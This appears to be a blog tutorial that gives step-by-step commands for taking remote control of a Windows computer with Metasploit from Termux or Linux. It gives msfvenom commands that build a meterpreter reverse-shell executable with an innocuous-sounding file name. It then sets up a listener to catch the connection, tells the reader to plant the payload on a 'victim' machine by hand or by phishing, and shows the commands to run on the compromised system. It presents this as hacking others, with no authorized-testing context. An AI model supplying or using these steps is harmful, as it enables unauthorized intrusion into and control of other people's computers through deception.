How to hack windows with termux and linux using metasploit

 Hello guy’s in this article we are going to discuss about how to hack windows with termux or and linux using metasploit. Just you follow the blow procedure it’s works perfectly.

First of all install metasploit tool in your termux with help of this below command if you use linux means this tool pre-installed so just open it.

pkg install metasploit

Step 1:

First you type this below command this command will help you to make raw windows payload on your linux or termux terminal.

msfvenom -p windows/meterpreter/reverse_tcp lhost=(Your IP) lport=4444 -f exe -a x86 > errorsfind.exe

Step 2:

Now we need to open metasploit tool so type this below command in your terminal this command will help you.

msfconsole

Step 3:

 Now type this below command this command will help you to start multi handler on your terminal.

use exploit/multi/handler

Step 4:

Now type this below command this command will help you to set payload on your terminal.

set payload windows/meterpreter/reverse_tcp

Step 5:

Now type this below Two command one by one this command will help you to set LHOST and LPORT on your terminal.
set LHOST (your ip)
set LPORT 4444

Step 6:

Just you type this below command this command will help you to exploit this above command on your terminal.
exploit
or
run

Step 7:

Now you install your payload on victim windows system manual or any phishing method

Step 8:

Once you installed your payload in victim machine your session automatically opened now type this below command to your terminal to check session.

 sysinfo

 if you need more information about victim device just type help command on your terminal you will get more hacking command.

Post a Comment

أحدث أقدم